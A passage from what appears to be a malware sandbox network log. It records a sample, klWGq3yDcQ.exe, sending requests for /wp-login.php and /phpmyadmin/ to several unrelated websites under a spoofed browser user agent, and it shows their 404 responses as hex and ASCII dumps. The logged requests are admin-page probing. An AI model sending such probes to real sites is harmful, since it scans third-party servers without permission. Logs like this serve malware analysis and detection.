                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:39 GMTServer: Apache/2.4.52 (Ubuntu)Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://talentius.com/wp-json/>; rel="https:
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC7749INData Raw: 31 65 63 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a
                                                                                                                                                                                                    Data Ascii: 1ecc<!DOCTYPE html><html lang="es-ES" class="no-js"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https:
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC141INData Raw: 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 75 69 2f 77 69 64 67 65 74 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 31 31 2e 34 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27
                                                                                                                                                                                                    Data Ascii: text/javascript' src='https://talentius.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script><script type='text/javascript' src='
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC8192INData Raw: 31 66 66 38 0d 0a 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 75 69 2f 6d 6f 75 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 31 31 2e 34 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 75 69 2f 64 72 61 67 67 61 62 6c 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 31 31 2e 34 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 74
                                                                                                                                                                                                    Data Ascii: 1ff8https://talentius.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4'></script><script type='text/javascript' src='https://talentius.com/wp-includes/js/jquery/ui/draggable.min.js?ver=1.11.4'></script><script type='text/javascript' src='https://t
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC6INData Raw: 31 66 66 38 0d 0a
                                                                                                                                                                                                    Data Ascii: 1ff8
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC8184INData Raw: 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 20 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 75 73 74 6f 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 63 75 73 74 6f 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 32 39 34 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 73 63 72 6f 6c 6c 22 20 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 6f 72 6d 61 63 69 6f 6e 2e 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 22 3e 41 43 43 45 53 4f 20 55 53 55 41 52 49 4f 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 09 09 09 09 09 3c 64 69 76 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 61 76 69 73 6f 2d 6c 65 67 61 6c 2f 23 61 76 69 73 6f 2d
                                                                                                                                                                                                    Data Ascii: lass="dropdown menu-item menu-item-type-custom menu-item-object-custom menu-item-294"><a class="page-scroll" target="_blank" href="http://formacion.talentius.com/">ACCESO USUARIO</a></li></ul><div><p><a href="http://talentius.com/aviso-legal/#aviso-
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC985INData Raw: 33 63 64 0d 0a 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 62 69 7a 6f 6e 65 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 70 61 72 61 6c 6c 61 78 2d 31 2e 31 2e 33 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 62 69 7a 6f 6e 65 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 66 61 6e 63 79 62 6f 78 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79
                                                                                                                                                                                                    Data Ascii: 3cd='text/javascript' src='https://talentius.com/wp-content/themes/bizone/assets/js/jquery.parallax-1.1.3.js'></script><script type='text/javascript' src='https://talentius.com/wp-content/themes/bizone/assets/js/jquery.fancybox.js'></script><script ty


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    252192.168.2.46163634.240.130.54436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC182OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: www.harasduberry.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC231INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 73 74 72 69 63 74 2d 74 72 61 6e 73 70 6f 72 74 2d 73 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 36 30 34 38 30 30 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingstrict-transport-security: max-age=604800Server: nginx
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC16153INData Raw: 66 33 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 20 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 2e 6a 69 6d 63 64 6e 2e 63 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 20 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 6a 69 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d
                                                                                                                                                                                                    Data Ascii: f3d<!DOCTYPE html><html lang="fr-FR"><head> <meta charset="utf-8"/> <link rel="dns-prefetch preconnect" href="https://u.jimcdn.com/" crossorigin="anonymous"/><link rel="dns-prefetch preconnect" href="https://assets.jimstatic.com/" crossorigin=
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC16384INData Raw: 72 65 73 20 63 68 65 76 61 75 78 20 c3 a0 20 76 65 6e 64 72 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 69 64 3d 22 63 63 2d 6e 61 76 2d 76 69 65 77 2d 32 31 31 35 39 31 35 33 37 39 22 20 63 6c 61 73 73 3d 22 6a 6d 64 2d 6e 61 76 5f 5f 6c 69 73 74 2d 69 74 65 6d 2d 30 20 6a 2d 6e 61 76 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 22 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 66 6f 73 2d 70 72 61 74 69 71 75 65 73 2d 70 61 72 2d 72 61 63 65 2f 22 20 64 61 74 61 2d 6c 69 6e 6b 2d 74 69 74 6c 65 3d 22 49 6e 66 6f 73 20 70 72 61 74 69 71 75 65 73 20 70 61 72 20 72 61 63 65 22 3e 49 6e 66 6f 73 20 70 72 61 74 69 71 75 65 73 20 70 61 72 20 72 61 63 65 3c 2f 61 3e 3c 73 70 61 6e 20 64 61 74 61 2d 6e 61 76 69 2d 74 6f 67 67 6c 65 3d 22 63 63 2d
                                                                                                                                                                                                    Data Ascii: res chevaux vendre</a></li></ul></li><li id="cc-nav-view-2115915379" class="jmd-nav__list-item-0 j-nav-has-children"><a href="/infos-pratiques-par-race/" data-link-title="Infos pratiques par race">Infos pratiques par race</a><span data-navi-toggle="cc-
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC7308INData Raw: 73 20 64 65 20 63 6f 6e 74 72 5c 75 30 30 66 34 6c 65 20 4a 69 6d 64 6f 5c 6e 5c 6e 4c 65 73 20 63 6f 6f 6b 69 0d 0a 66 66 38 0d 0a 65 73 20 64 65 20 63 6f 6e 74 72 5c 75 30 30 66 34 6c 65 20 4a 69 6d 64 6f 20 70 65 72 6d 65 74 74 65 6e 74 20 61 75 20 76 69 73 69 74 65 75 72 20 64 75 20 73 69 74 65 20 64 27 61 75 74 6f 72 69 73 65 72 20 6c 65 73 20 73 65 72 76 69 63 65 73 5c 2f 63 6f 6f 6b 69 65 73 20 73 5c 75 30 30 65 39 6c 65 63 74 69 6f 6e 6e 5c 75 30 30 65 39 73 20 65 74 20 65 6e 72 65 67 69 73 74 72 65 6e 74 20 6c 65 75 72 73 20 70 72 5c 75 30 30 65 39 66 5c 75 30 30 65 39 72 65 6e 63 65 73 20 65 6e 20 6d 61 74 69 5c 75 30 30 65 38 72 65 20 64 65 20 63 6f 6f 6b 69 65 73 2e 5c 6e 5c 6e 50 72 65 73 74 61 74 61 69 72 65 20 3a 5c 6e 4a 69 6d 64 6f 20 47
                                                                                                                                                                                                    Data Ascii: s de contr\u00f4le Jimdo\n\nLes cookiff8es de contr\u00f4le Jimdo permettent au visiteur du site d'autoriser les services\/cookies s\u00e9lectionn\u00e9s et enregistrent leurs pr\u00e9f\u00e9rences en mati\u00e8re de cookies.\n\nPrestataire :\nJimdo G


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    253192.168.2.461620194.47.252.1154436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.maxiv.lu.se
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC571INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 30 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 6c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not Founddate: Sun, 26 Nov 2023 05:59:40 GMTserver: Apache/2.4.57 (Debian)x-powered-by: PHP/8.2.12expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://www.maxiv.lu.se/wp-json/>; r
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC6309INData Raw: 31 38 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4d 41 58 20 49 56 3c 2f 74 69 74
                                                                                                                                                                                                    Data Ascii: 189D<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; MAX IV</tit
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC16314INData Raw: 33 46 42 32 0d 0a 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a
                                                                                                                                                                                                    Data Ascii: 3FB2-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color:
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC16328INData Raw: 33 46 43 30 0d 0a 31 2e 31 20 37 37 2e 32 2d 31 36 30 2e 31 68 2e 32 7a 6d 2d 33 31 33 20 34 30 32 2e 35 63 2d 31 34 2d 35 33 2d 31 34 2d 31 30 38 2e 37 20 30 2d 31 36 31 2e 37 68 31 33 36 2e 36 63 2d 33 2e 35 20 32 36 2e 38 2d 35 2e 34 20 35 33 2e 38 2d 35 2e 37 20 38 30 2e 38 2e 33 20 32 37 20 32 2e 31 20 35 34 20 35 2e 37 20 38 30 2e 38 6c 2d 31 33 36 2e 36 2e 31 7a 6d 33 33 2e 32 20 38 30 2e 38 68 31 31 39 2e 32 63 31 32 2e 36 20 35 30 2e 31 20 33 31 2e 34 20 39 38 2e 34 20 35 35 2e 38 20 31 34 33 2e 39 2d 37 33 2e 39 2d 32 35 2e 32 2d 31 33 36 2d 37 36 2e 33 2d 31 37 35 2d 31 34 33 2e 39 7a 6d 31 31 39 2e 32 2d 33 32 33 2e 33 48 32 32 30 2e 32 63 33 39 2d 36 37 2e 35 20 31 30 31 2e 32 2d 31 31 38 2e 37 20 31 37 35 2d 31 34 33 2e 39 2d 32 34 2e 33 20
                                                                                                                                                                                                    Data Ascii: 3FC01.1 77.2-160.1h.2zm-313 402.5c-14-53-14-108.7 0-161.7h136.6c-3.5 26.8-5.4 53.8-5.7 80.8.3 27 2.1 54 5.7 80.8l-136.6.1zm33.2 80.8h119.2c12.6 50.1 31.4 98.4 55.8 143.9-73.9-25.2-136-76.3-175-143.9zm119.2-323.3H220.2c39-67.5 101.2-118.7 175-143.9-24.3
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC16320INData Raw: 33 46 42 38 0d 0a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 32 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 75 73 65 72 2d 61 63 63 65 73 73 2f 63 61 6c 6c 2d 66 6f 72 2d 70 72 6f 70 6f 73 61 6c 73 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 43 61 6c 6c 20 66 6f 72 20 70 72 6f 70 6f 73 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 69 74 65 6d 2d 64 65 70 74 68 2d 32 27 3e 3c 61 20 68
                                                                                                                                                                                                    Data Ascii: 3FB8ect-page item-depth-2'><a href="https://www.maxiv.lu.se/user-access/call-for-proposals/" class="menu-item-label">Call for proposals</a></li><li class='menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children item-depth-2'><a h
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC16328INData Raw: 33 46 43 30 0d 0a 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d 65 6e 75 2d 74 6f 67 67 6c 65 72 20 64 2d 6e 6f 6e 65 20 6d 69 6e 75 73 2d 69 63 6f 6e 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 2d 73 68 61 72 70 22 3e 72 65 6d 6f 76 65 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 75 6c 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 69 74 65 6d 2d 64 65 70 74 68 2d 35 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f
                                                                                                                                                                                                    Data Ascii: 3FC0"material-icon submenu-toggler d-none minus-icon" aria-hidden="true"><span class="material-icons-sharp">remove</span></span><ul><li class='menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children item-depth-5'><a href="https:/
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC16320INData Raw: 33 46 42 38 0d 0a 2f 62 65 61 6d 6c 69 6e 65 73 2f 66 65 6d 74 6f 6d 61 78 2f 75 73 65 72 2d 69 6e 66 6f 72 6d 61 74 69 6f 6e 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 55 73 65 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 61 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d 65 6e 75 2d 74 6f 67 67 6c 65 72 20 70 6c 75 73 2d 69 63 6f 6e 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 2d 73 68 61 72 70 22 3e 61 64 64 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d 65 6e 75 2d 74 6f 67 67 6c 65
                                                                                                                                                                                                    Data Ascii: 3FB8/beamlines/femtomax/user-information/" class="menu-item-label">User information</a><span class="material-icon submenu-toggler plus-icon" aria-hidden="true"><span class="material-icons-sharp">add</span></span><span class="material-icon submenu-toggle
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC16328INData Raw: 33 46 43 30 0d 0a 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6e 6f 2d 62 6f 72 64 65 72 20 69 74 65 6d 2d 64 65 70 74 68 2d 35 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 62 65 61 6d 6c 69 6e 65 73 2f 68 69 70 70 69 65 2f 65 78 70 65 72 69 6d 65 6e 74 61 6c 2d 73 74 61 74 69 6f 6e 2f 73 6f 6c 69 64 2d 6c 69 71 75 69 64 2d 62 72 61 6e 63 68 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 53 6f 6c 69 64 2d 4c 69 71 75 69 64 20 42 72 61 6e 63 68 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 2f 6c 69 3e
                                                                                                                                                                                                    Data Ascii: 3FC0 menu-item-type-post_type menu-item-object-page no-border item-depth-5'><a href="https://www.maxiv.lu.se/beamlines-accelerators/beamlines/hippie/experimental-station/solid-liquid-branch/" class="menu-item-label">Solid-Liquid Branch</a></li><li></li>
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC16328INData Raw: 33 46 43 30 0d 0a 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 34 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 62 65 61 6d 6c 69 6e 65 73 2f 76 65 72 69 74 61 73 2f 62 65 61 6d 6c 69 6e 65 2d 6f 70 74 69 63 73 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 42 65 61 6d 6c 69 6e 65 20 6f 70 74 69 63 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 34 27 3e 3c 61 20
                                                                                                                                                                                                    Data Ascii: 3FC0ject-page item-depth-4'><a href="https://www.maxiv.lu.se/beamlines-accelerators/beamlines/veritas/beamline-optics/" class="menu-item-label">Beamline optics</a></li><li class='menu-item menu-item-type-post_type menu-item-object-page item-depth-4'><a
